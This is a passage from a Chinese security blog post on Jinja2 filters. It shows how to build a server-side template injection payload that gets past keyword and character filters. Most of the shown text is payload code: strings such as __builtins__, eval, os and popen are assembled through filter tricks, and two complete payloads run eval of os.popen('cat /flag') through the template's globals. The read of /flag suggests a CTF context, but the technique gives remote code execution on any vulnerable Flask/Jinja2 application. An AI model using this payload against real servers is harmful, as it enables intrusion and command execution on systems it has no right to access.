<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> os = <span class="built_in">dict</span>(o=aa,s=dd)|join %&#125; </span><br></pre></td></tr></table></figure></div>

<p>cat</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> ca = <span class="built_in">dict</span>(ca=aa,t=dd)|join %&#125;</span><br></pre></td></tr></table></figure></div>

<p>flag</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> flg = <span class="built_in">dict</span>(fl=aa,ag=dd)|join %&#125;</span><br></pre></td></tr></table></figure></div>

<p>eval</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> ev = <span class="built_in">dict</span>(ev=aa,al=dd)|join %&#125; </span><br></pre></td></tr></table></figure></div>

<p>read</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> red = <span class="built_in">dict</span>(re=aa,ad=dd)|join %&#125;  </span><br></pre></td></tr></table></figure></div>

<p><code>__builtins__</code></p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> bul = xhx*<span class="number">2</span>~but~xhx*<span class="number">2</span> %&#125;</span><br></pre></td></tr></table></figure></div>

<p>将上面构造的字符或字符串拼接起来构造出 <code>__import__(&#39;os&#39;).popen(&#39;cat /flag&#39;).read()</code>：</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> pld = xhx*<span class="number">2</span>~imp~xhx*<span class="number">2</span>~left~yin~os~yin~right~point~pon~left~yin~ca~space~slas~flg~yin~right~point~red~left~right %&#125;</span><br></pre></td></tr></table></figure></div>

<p>pld放入SSTI万能payload</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="keyword">for</span> f,v <span class="keyword">in</span> whoami.__init__.__globals__.items() %&#125;    <span class="comment"># globals</span></span><br><span class="line">    &#123;% <span class="keyword">if</span> f == bul %&#125; </span><br><span class="line">        &#123;% <span class="keyword">for</span> a,b <span class="keyword">in</span> v.items() %&#125;    <span class="comment"># builtins</span></span><br><span class="line">            &#123;% <span class="keyword">if</span> a == ev %&#125;    <span class="comment"># eval</span></span><br><span class="line">                &#123;&#123;b(pld)&#125;&#125;    <span class="comment"># eval(&quot;__import__(&#x27;os&#x27;).popen(&#x27;cat /flag&#x27;).read()&quot;)</span></span><br><span class="line">            &#123;% endif %&#125;</span><br><span class="line">        &#123;% endfor %&#125;</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure></div>

<p>过滤.的版本</p>
<div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> pld = xhx~xhx~imp~xhx~xhx~left~yin~so~yin~right~point~pon~left~yin~ca~space~slas~flg~yin~right~point~red~left~right %&#125;</span><br><span class="line">&#123;% <span class="keyword">for</span> f,v <span class="keyword">in</span> (<span class="variable language_">self</span>|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(itm))() %&#125;</span><br><span class="line">    &#123;% <span class="keyword">if</span> f == bul %&#125;</span><br><span class="line">        &#123;% <span class="keyword">for</span> a,b <span class="keyword">in</span> (v|attr(itm))() %&#125;</span><br><span class="line">            &#123;% <span class="keyword">if</span> a == ev %&#125;</span><br><span class="line">            		&#123;%<span class="built_in">print</span>(b(pld))%&#125;</span><br><span class="line">            &#123;% endif %&#125;</span><br><span class="line">        &#123;% endfor %&#125;</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure></div>

<h3 id="完整payload"><a href="#完整payload" class="headerlink" title="完整payload"></a>完整payload</h3><div class="highlight-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">&#123;% <span class="built_in">set</span> zero = (<span class="variable language_">self</span>|<span class="built_in">int</span>) %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> one = (zero**zero)|<span class="built_in">int</span> %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> two = (zero-one-one)|<span class="built_in">abs</span> %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> four = (two*two)|<span class="built_in">int</span> %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> five = (two*two*two)-one-one-one %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> three = five-one-one %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> nine = (two*two*two*two-five-one-one) %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> seven = (zero-one-one-five)|<span class="built_in">abs</span> %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> space = <span class="variable language_">self</span>|string|<span class="built_in">min</span> %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> point = <span class="variable language_">self</span>|<span class="built_in">float</span>|string|<span class="built_in">min</span> %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> c = <span class="built_in">dict</span>(c=aa)|reverse|first %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> bfh = <span class="variable language_">self</span>|string|urlencode|first %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> bfhc = bfh~c %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> slas = bfhc%((four~seven)|<span class="built_in">int</span>) %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> yin = bfhc%((three~nine)|<span class="built_in">int</span>) %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> xhx = bfhc%((nine~five)|<span class="built_in">int</span>) %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> right = bfhc%((four~one)|<span class="built_in">int</span>) %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> left = bfhc%((four~zero)|<span class="built_in">int</span>) %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> but = <span class="built_in">dict</span>(buil=aa,tins=dd)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> imp = <span class="built_in">dict</span>(imp=aa,ort=dd)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> pon = <span class="built_in">dict</span>(po=aa,pen=dd)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> so = <span class="built_in">dict</span>(o=aa,s=dd)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> ca = <span class="built_in">dict</span>(ca=aa,t=dd)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> flg = <span class="built_in">dict</span>(fl=aa,ag=dd)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> ev = <span class="built_in">dict</span>(ev=aa,al=dd)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> red = <span class="built_in">dict</span>(re=aa,ad=dd)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> sl = <span class="built_in">dict</span>(l=aa,s=dd)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> bul = xhx~xhx~but~xhx~xhx %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> ini = <span class="built_in">dict</span>(ini=aa,t=bb)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> glo = <span class="built_in">dict</span>(glo=aa,bals=bb)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> itm = <span class="built_in">dict</span>(ite=aa,ms=bb)|join %&#125;</span><br><span class="line">&#123;% <span class="built_in">set</span> pld = xhx~xhx~imp~xhx~xhx~left~yin~so~yin~right~point~pon~left~yin~ca~space~slas~flg~yin~right~point~red~left~right %&#125;</span><br><span class="line">&#123;% <span class="keyword">for</span> f,v <span class="keyword">in</span> (<span class="variable language_">self</span>|attr(xhx~xhx~ini~xhx~xhx)|attr(xhx~xhx~glo~xhx~xhx)|attr(itm))() %&#125;</span><br><span class="line">&#123;% <span class="keyword">if</span> f == bul %&#125;</span><br><span class="line">&#123;% <span class="keyword">for</span> a,b <span class="keyword">in</span> (v|attr(itm))() %&#125;</span><br><span class="line">&#123;% <span class="keyword">if</span> a == ev %&#125;</span><br><span class="line">&#123;%<span class="built_in">print</span>(b(pld))%&#125;</span><br><span class="line">&#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br><span class="line">&#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure></div>


        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>标题:</strong> jinjia2 过滤器</li>
        <li><strong>作者:</strong> Sl0th</li>
        <li><strong>创建于
                :</strong> 2023-01-16 22:57:46</li>
        
            <li>
                <strong>更新于
                    :</strong> 2024-07-03 22:58:38
            </li>
        
        <li>
            <strong>链接:</strong> http://sl0th.top/2023/01/16/jinjia2-过滤器/
        </li>
        <li>
            <strong>
                版权声明:
            </strong>
            

            
                本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a> 进行许可。
            
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/web/">#web</a>&nbsp;
                    </li>
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/ssti/">#ssti</a>&nbsp;
                    </li>
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/python/">#python</a>&nbsp;
                    </li>
                
            </ul>
        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                    <div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="prev"
                        rel="prev"
                        href="/2023/01/20/Java%E5%AE%89%E5%85%A8%E4%B9%8B%E5%86%85%E5%AD%98%E9%A9%AC/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">JavaWeb内存马学习</span>
                                <span class="post-nav-item">上一篇</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2022/12/27/log4j%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">log4j2漏洞学习</span>
                                <span class="post-nav-item">下一篇</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
            <div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
                <div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        评论
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.mjs';

      function loadWaline() {
        init({
          el: '#waline',
          serverURL: 'https://example.example.com',
          lang: 'zh-CN',
          dark: 'body[class~="dark-mode"]',
          reaction: false,
          requiredMeta: ['nick', 'mail'],
          emoji: [],
          
          
        });
      }

      if (typeof swup !== 'undefined') {
        loadWaline();
      } else {
        window.addEventListener('DOMContentLoaded', loadWaline);
      }
    </script>



        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">目录</div>
        <div class="page-title">jinjia2 过滤器</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#jinjia2-%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="nav-text">jinjia2  过滤器</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#flask-%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="nav-text">flask 过滤器</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E7%94%A8%E8%BF%87%E6%BB%A4%E5%99%A8"><span class="nav-text">常用过滤器</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E6%80%9D%E8%B7%AF"><span class="nav-text">基本思路</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E5%85%A5%E5%8F%A3%E7%82%B9"><span class="nav-text">获取入口点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%8E%B7%E5%8F%96%E7%89%B9%E5%AE%9A%E5%AD%97%E7%AC%A6"><span class="nav-text">获取特定字符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#c%E7%9A%84%E5%88%A9%E7%94%A8"><span class="nav-text">%c的利用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B8%B8%E8%A7%81%E5%AD%97%E6%AE%B5"><span class="nav-text">常见字段</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AE%8C%E6%95%B4payload"><span class="nav-text">完整payload</span></a></li></ol></li></ol></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">Sl0th</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        共撰写了 44 篇文章
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">访问人数</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">总访问量</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">由 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a> 驱动</span>
            <span class="text-sm lg:block">主题&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.7.3</a></span>
        </div>
        
        
            <div>
                博客已运行 <span class="odometer" id="runtime_days" ></span> 天 <span class="odometer" id="runtime_hours"></span> 小时 <span class="odometer" id="runtime_minutes"></span> 分钟 <span class="odometer" id="runtime_seconds"></span> 秒
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>








    
<script src="/js/libs/anime.min.js"></script>





    
<script src="/js/tools/tocToggle.js" type="module" data-swup-reload-script=""></script>

<script src="/js/layouts/toc.js" type="module" data-swup-reload-script=""></script>

<script src="/js/plugins/tabs.js" type="module" data-swup-reload-script=""></script>




<script src="/js/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>


<script src="/js/layouts/essays.js" type="module" data-swup-reload-script=""></script>




</body>
</html>
